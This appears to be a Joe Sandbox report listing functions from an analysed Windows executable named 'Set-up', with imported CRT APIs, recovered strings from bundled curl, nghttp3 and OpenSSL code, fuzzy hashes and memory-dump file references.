Instruction ID: 435dceb132ac1bdc3d5e7699a3295d22133ad6c2d1eba1706de81dfda0633d37
Opcode Fuzzy Hash: 1efc63e94736ec762dde092320e3d59adf545601741b22b2780315d7096a2df3
Instruction Fuzzy Hash: 61F0B7786157418FC708BFB8C48081E77E0AFA9718F504AA8E6905B360D735D941AF56

Function 00E245C0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 259COMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,00000000,?,?,00DF5B6B,00000017,?,?), ref: 00E24612
memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789abcdef,?,00000011), ref: 00E24660

Strings

0123456789ABCDEF, xrefs: 00E24683, 00E24694
0123456789abcdef, xrefs: 00E2465B, 00E2466C

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: _errnomemchr
String ID: 0123456789ABCDEF$0123456789abcdef
API String ID: 4119152314-885041942
Opcode ID: f84572f9682ec1f28412826da2448aa9a1b92afcbf98640e7d010edc4d0b1740
Instruction ID: 8505af3105e2453f193535e6354e73bb7224e233bcaeadaf19e286f22ce08607
Opcode Fuzzy Hash: f84572f9682ec1f28412826da2448aa9a1b92afcbf98640e7d010edc4d0b1740
Instruction Fuzzy Hash: 159117B1A083618BD72CDF28E84026AB7D1BFD6318F199A2EE9D5A73C1D7319D448742

Function 00E12250 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00E1225F
_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00E122CF

Strings

Hostname in DNS cache does not have needed family, zapped, xrefs: 00E123EF, 00E123FE
Hostname in DNS cache was stale, zapped, xrefs: 00E12322
:%u, xrefs: 00E12290, 00E12363

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: _time64strlen
String ID: :%u$Hostname in DNS cache does not have needed family, zapped$Hostname in DNS cache was stale, zapped
API String ID: 3014104814-1335658360
Opcode ID: 2a96f1dee47d751cb43c540e78c47f8221938d8bd6bdc1d259fab646b07ea591
Instruction ID: 41534be6d9a8f86b7069803aac955482c6809d1e7ca182a1432e0c6ea0c205dd
Opcode Fuzzy Hash: 2a96f1dee47d751cb43c540e78c47f8221938d8bd6bdc1d259fab646b07ea591
Instruction Fuzzy Hash: 7D4127B16003055BD7249A24DC81BFBB3D5EF84718F08543CEBAAE7282E635ACA5D761

Function 00E706F0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 117COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(ctx->next_absidx > absidx,nghttp3_qpack.c,000008B6,?,?,00E70307,?), ref: 00E707AE
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(ctx->next_absidx - absidx - 1 < nghttp3_ringbuf_len(&ctx->dtable),nghttp3_qpack.c,000008B7,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00E707C3

Strings

nghttp3_qpack.c, xrefs: 00E707A4, 00E707B9
ctx->next_absidx > absidx, xrefs: 00E707A9
ctx->next_absidx - absidx - 1 < nghttp3_ringbuf_len(&ctx->dtable), xrefs: 00E707BE

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: _assert
String ID: ctx->next_absidx - absidx - 1 < nghttp3_ringbuf_len(&ctx->dtable)$ctx->next_absidx > absidx$nghttp3_qpack.c
API String ID: 1222420520-241347991
Opcode ID: 8bf55d1c7462345def13142b4ab26bf7092b35137a9769213ec34655d0a8737c
Instruction ID: d7213aafeff86775d69f2f8bbf60b6fc0534ad6cd13ec880c6ecc1c9514e7def
Opcode Fuzzy Hash: 8bf55d1c7462345def13142b4ab26bf7092b35137a9769213ec34655d0a8737c
Instruction Fuzzy Hash: AE31E7757407049FE314EA28EC81E2B73D5EF89718F04952CF94AA7342E630BD5187D2

Function 01144610 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 116fileCOMMON

Download Yara Rule

APIs

_stat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00DD5FB6,?), ref: 01144645
_stat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(../list/public_suffix_list.dat,?), ref: 01144698
fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,014AE1F8), ref: 01144744
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 01144762

Strings

../list/public_suffix_list.dat, xrefs: 01144693, 011446B9, 011446F5

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: _stat64$fclosefopen
String ID: ../list/public_suffix_list.dat
API String ID: 1085753941-141370353
Opcode ID: e4b75ef706b3d224d8f59731298d72cdfa0a5db88781fd10c0113902d51e8194
Instruction ID: 3fe748a5b9ca50e73d8541dd2c72874d338465d5c7f711c71067896594be9781
Opcode Fuzzy Hash: e4b75ef706b3d224d8f59731298d72cdfa0a5db88781fd10c0113902d51e8194
Instruction Fuzzy Hash: D041CFB2A083019FE708CF58D48075ABBE6FB84B45F15482DE998D7750D770E949CB93

Function 00E32680 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 98COMMON

Download Yara Rule

APIs

_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00E32771

Strings

gfff, xrefs: 00E326EE
set timeouts for state %d; Total % lld, retry %d maxtry %d, xrefs: 00E32761
Connection time-out, xrefs: 00E326CD
netascii, xrefs: 00E32680

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: _time64
String ID: Connection time-out$gfff$netascii$set timeouts for state %d; Total % lld, retry %d maxtry %d
API String ID: 1670930206-2395985473
Opcode ID: a8939da551784f2ed723b55ec5ee390bf61f1f19c1616efdde7cd0a0b2087d16
Instruction ID: c48f484046b43a30ea58dc74aebfe25cf6f0077fd128d5bb05a72247798668c8
Opcode Fuzzy Hash: a8939da551784f2ed723b55ec5ee390bf61f1f19c1616efdde7cd0a0b2087d16
Instruction Fuzzy Hash: 06212CB17003045FE728AA29AC06F2779DAEFC4708F18853DF64ADB2D2F971D801C661

Function 00E66010 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(veccnt > 0,nghttp3_stream.c,0000033D), ref: 00E66119
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(0 == offset,nghttp3_stream.c,00000349), ref: 00E6612E

Strings

nghttp3_stream.c, xrefs: 00E6610F, 00E66124
0 == offset, xrefs: 00E66129
veccnt > 0, xrefs: 00E66114

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: _assert
String ID: 0 == offset$nghttp3_stream.c$veccnt > 0
API String ID: 1222420520-3888743547
Opcode ID: 485e4ecd5d2188a2c032a632a36b0c6f88831f73c59c25181b114947ed0dbdc2
Instruction ID: e7817a472e4e39f7993a20d8ea00fb14823f01cf9d3a733be01a241e24fbe7a1
Opcode Fuzzy Hash: 485e4ecd5d2188a2c032a632a36b0c6f88831f73c59c25181b114947ed0dbdc2
Instruction Fuzzy Hash: C7314771A443048FC714EF14E885A6AB7E0FF88358F05867CE88A6B312E671BD41CB91

Function 010646B0 Relevance: 7.8, APIs: 1, Strings: 4, Instructions: 324stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 010646DD

Strings

minsize=%ld, xrefs: 0106485A
maxsize=%ld, xrefs: 01064899
crypto/asn1/a_mbstr.c, xrefs: 0106479E, 010647C3, 010647E8, 0106480D, 0106484C, 0106488B, 01064933, 01064A3F, 01064A9D
ASN1_mbstring_ncopy, xrefs: 01064797, 010647BC, 010647E1, 01064806, 01064845, 01064884, 0106492C, 010649DE, 01064A35

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: strlen
String ID: ASN1_mbstring_ncopy$crypto/asn1/a_mbstr.c$maxsize=%ld$minsize=%ld
API String ID: 39653677-2338284442
Opcode ID: 6a43529ac70a2be33b5d1310821daa70b81a5d88b5b251263331351e9e19901b
Instruction ID: a7324a7b72b9fa65bd9ad11cd8a3362d5b8cfff3f91e0e077cbfa4edf7e18070
Opcode Fuzzy Hash: 6a43529ac70a2be33b5d1310821daa70b81a5d88b5b251263331351e9e19901b
Instruction Fuzzy Hash: F3A11971B48301ABE3646E149C02B2E77D8AB91B44F55442DFECDEB3C3D6B5D80086A7

Function 00FB2530 Relevance: 7.8, APIs: 3, Strings: 2, Instructions: 306COMMON

Download Yara Rule

Strings

crypto/objects/obj_dat.c, xrefs: 00FB2810
.%lu, xrefs: 00FB2761

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID:
String ID: .%lu$crypto/objects/obj_dat.c
API String ID: 0-3322715555
Opcode ID: 09f11aed367b4d76bb9bb1e475b96300b07932ab285c6724be144ff674f2be99
Instruction ID: 1075ed485a1663207088fa438305903d1dd36a87ec3452d379796b5065a47339
Opcode Fuzzy Hash: 09f11aed367b4d76bb9bb1e475b96300b07932ab285c6724be144ff674f2be99
Instruction Fuzzy Hash: 9CA10872E083015BD7609E168D507ABB7E6AFD4714F18882DEC888B251EB75DC05FF92

Function 00DF0080 Relevance: 7.8, APIs: 1, Strings: 4, Instructions: 301stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00DF0090

Part of subcall function 00EAF340: _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,?,00DF00B0,?,?,00000000,00000000,?), ref: 00EAF35D

Strings

File already completely downloaded, xrefs: 00DF4239
Offset (%lld) was beyond file size (%lld), xrefs: 00DF4CF5, 00DF4D0E, 00DF4D64
$, xrefs: 00DF4D75
Bad file size (%lld), xrefs: 00DF4CFF

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: _time64strlen
String ID: $$Bad file size (%lld)$File already completely downloaded$Offset (%lld) was beyond file size (%lld)
API String ID: 3014104814-979756411
Opcode ID: 217919ce5dab38bdb6f5e8bfd05990e284deb7caecd3f62bf1466b312276bce2
Instruction ID: 2df9dea43bcb1510bd9c10a7236d189ce83c1988571d767cdb7e41277db73fdc
Opcode Fuzzy Hash: 217919ce5dab38bdb6f5e8bfd05990e284deb7caecd3f62bf1466b312276bce2
Instruction Fuzzy Hash: A1B1E271A043449FD714DF28C880A7BB7E5EFC9314F19862DFA94973A2D771AC448BA2

Function 00DDE300 Relevance: 7.8, APIs: 1, Strings: 4, Instructions: 283COMMON

Download Yara Rule

Strings

User-Agent: %s, xrefs: 00DDE60C
transfer.c, xrefs: 00DDE331, 00DDE364, 00DDE479, 00DDE59A, 00DDE5E4, 00DDE70D, 00DDE729
No URL set, xrefs: 00DDE393
cannot mix POSTFIELDS with RESUME_FROM, xrefs: 00DDE3C1

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID:
String ID: No URL set$User-Agent: %s$cannot mix POSTFIELDS with RESUME_FROM$transfer.c
API String ID: 0-950935550
Opcode ID: b629d496fcc1a30feaa46fb62294987ca4558c017664e14d0a77cb0c13ac98a8
Instruction ID: f3594fb123ef833410f766334210ea30afa738903bd772b605a519c6a89bbf2e
Opcode Fuzzy Hash: b629d496fcc1a30feaa46fb62294987ca4558c017664e14d0a77cb0c13ac98a8
Instruction Fuzzy Hash: 64B1D6B5B00A026BE729AB74DC45BA6F7A0BF51315F08022AE51897381E736B464DBF1

Function 00F1A210 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 152stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00F1A37F

Strings

QUIC error code: 0x%llx%s%s%s, reason: "%s", xrefs: 00F1A3D5
ossl_quic_channel_raise_protocol_error_loc, xrefs: 00F1A2D9, 00F1A3B0
QUIC error code: 0x%llx%s%s%s (triggered by frame type: 0x%llx%s%s%s), reason: "%s", xrefs: 00F1A310
ssl/quic/quic_channel.c, xrefs: 00F1A2E3, 00F1A3BA

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: strlen
String ID: QUIC error code: 0x%llx%s%s%s (triggered by frame type: 0x%llx%s%s%s), reason: "%s"$QUIC error code: 0x%llx%s%s%s, reason: "%s"$ossl_quic_channel_raise_protocol_error_loc$ssl/quic/quic_channel.c
API String ID: 39653677-1084217658
Opcode ID: c1d6560224d2f747af596e9cdccf898de90bafb253d28faacbac1dfd100e00db
Instruction ID: 20764c7116e8c23cf97f78833ec53afa15f009a067431cc89a89ce069956dad9
Opcode Fuzzy Hash: c1d6560224d2f747af596e9cdccf898de90bafb253d28faacbac1dfd100e00db
Instruction Fuzzy Hash: 3D51DFB1A04345ABCB01EF65DC42E8B7BE8AF88314F448839FD4C97241E775D910DBA2

Function 01146250 Relevance: 7.7, APIs: 5, Instructions: 151COMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00E90E3B,?,?,00000000,?), ref: 011463E9
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00E90E3B,?,?,00000000,?), ref: 011463FB

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
